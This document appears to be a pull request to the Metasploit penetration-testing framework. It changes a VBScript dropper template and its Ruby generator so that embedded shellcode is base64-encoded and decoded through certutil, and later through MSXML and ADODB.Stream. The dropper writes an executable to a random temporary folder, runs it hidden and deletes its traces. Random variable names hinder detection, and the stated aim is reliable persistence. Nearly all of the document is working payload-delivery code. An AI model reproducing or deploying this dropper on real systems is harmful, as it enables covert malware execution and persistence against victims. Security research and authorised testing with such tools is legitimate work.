### PR TITLE
Send base64ed shellcode and decode with certutil

### DIFF
--- a/data/templates/scripts/to_exe.vbs.template
+++ b/data/templates/scripts/to_exe.vbs.template
@@ -19,7 +19,7 @@ Function %{var_func}()
 	Set %{var_shell} = CreateObject("Wscript.Shell")
 	%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
 	%{var_shell}.run %{var_tempexe}, 0, true
-    %{var_obj}.DeleteFile(%{var_tempexe})
+	%{var_obj}.DeleteFile(%{var_tempexe})
 	%{var_obj}.DeleteFile(%{var_tempbase64})
 	%{var_obj}.DeleteFolder(%{var_basedir})
 End Function

--- a/data/templates/scripts/to_exe.vbs.template
+++ b/data/templates/scripts/to_exe.vbs.template
@@ -1,26 +1,33 @@
+Function %{var_decodefunc}(%{var_decodebase64})
+	%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
+		"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
+		%{var_decodebase64} & "</B64DECODE>"
+	Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")
+	%{var_xmldoc}.LoadXML(%{var_xml})
+	%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue
+	set %{var_xmldoc} = nothing
+End Function
+
 Function %{var_func}()
 	%{var_shellcode} = "%{base64_shellcode}"
-
 	Dim %{var_obj}
 	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
-	Dim %{var_stream}
 	Dim %{var_tempdir}
-	Dim %{var_tempbase64}
 	Dim %{var_basedir}
 	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 	%{var_obj}.CreateFolder(%{var_basedir})
-	%{var_tempbase64} = %{var_basedir} & "\" & "%{base64_filename}"
 	%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
-	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
-	%{var_stream}.Write %{var_shellcode}
-	%{var_stream}.Close
 	Dim %{var_shell}
 	Set %{var_shell} = CreateObject("Wscript.Shell")
-	%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
+	%{var_decoded} = %{var_decodefunc}(%{var_shellcode})
+	Set %{var_adodbstream} = CreateObject("ADODB.Stream")
+	%{var_adodbstream}.Type = 1
+	%{var_adodbstream}.Open
+	%{var_adodbstream}.Write %{var_decoded}
+	%{var_adodbstream}.SaveToFile %{var_tempexe}, 2
 	%{var_shell}.run %{var_tempexe}, 0, true
 	%{var_obj}.DeleteFile(%{var_tempexe})
-	%{var_obj}.DeleteFile(%{var_tempbase64})
 	%{var_obj}.DeleteFolder(%{var_basedir})
 End Function
 

--- a/data/templates/scripts/to_exe.vbs.template
+++ b/data/templates/scripts/to_exe.vbs.template
@@ -1,25 +1,26 @@
 Function %{var_func}()
-	%{var_shellcode} = "%{hex_shellcode}"
+	%{var_shellcode} = "%{base64_shellcode}"
 
 	Dim %{var_obj}
 	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
 	Dim %{var_stream}
 	Dim %{var_tempdir}
-	Dim %{var_tempexe}
+	Dim %{var_tempbase64}
 	Dim %{var_basedir}
 	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 	%{var_obj}.CreateFolder(%{var_basedir})
+	%{var_tempbase64} = %{var_basedir} & "\" & "%{base64_filename}"
 	%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
-	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
-	For i = 1 to Len(%{var_shellcode}) Step 2
-	    %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
-	Next
+	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
+	%{var_stream}.Write %{var_shellcode}
 	%{var_stream}.Close
 	Dim %{var_shell}
 	Set %{var_shell} = CreateObject("Wscript.Shell")
+	%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
 	%{var_shell}.run %{var_tempexe}, 0, true
-	%{var_obj}.DeleteFile(%{var_tempexe})
+    %{var_obj}.DeleteFile(%{var_tempexe})
+	%{var_obj}.DeleteFile(%{var_tempbase64})
 	%{var_obj}.DeleteFolder(%{var_basedir})
 End Function
 

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1243,6 +1243,7 @@ require 'msf/core/exe/segment_appender'
 
     hash_sub = {}
     hash_sub[:exe_filename]  = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
+    hash_sub[:base64_filename]  = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'
     hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_fname]     = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_func]      = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -1251,9 +1252,10 @@ require 'msf/core/exe/segment_appender'
     hash_sub[:var_shell]     = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_tempdir]   = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_tempexe]   = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_tempbase64]   = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_basedir]   = Rex::Text.rand_text_alpha(rand(8)+8)
 
-    hash_sub[:hex_shellcode] = exes.unpack('H*').join('')
+    hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
 
     hash_sub[:init] = ""
 

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1247,16 +1247,18 @@ require 'msf/core/exe/segment_appender'
     hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_fname]     = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_func]      = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_stream]    = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_obj]       = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_shell]     = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_tempdir]   = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_tempexe]   = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_tempbase64]   = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_basedir]   = Rex::Text.rand_text_alpha(rand(8)+8)
-
     hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
-
+    hash_sub[:var_decodefunc] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_xml] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_xmldoc] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_decoded] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_adodbstream] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_decodebase64] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:init] = ""
 
     if persist


### PR DESCRIPTION
This is a fix for #6053 making it possible to persist in non-ascii environments with the vbs dropper.
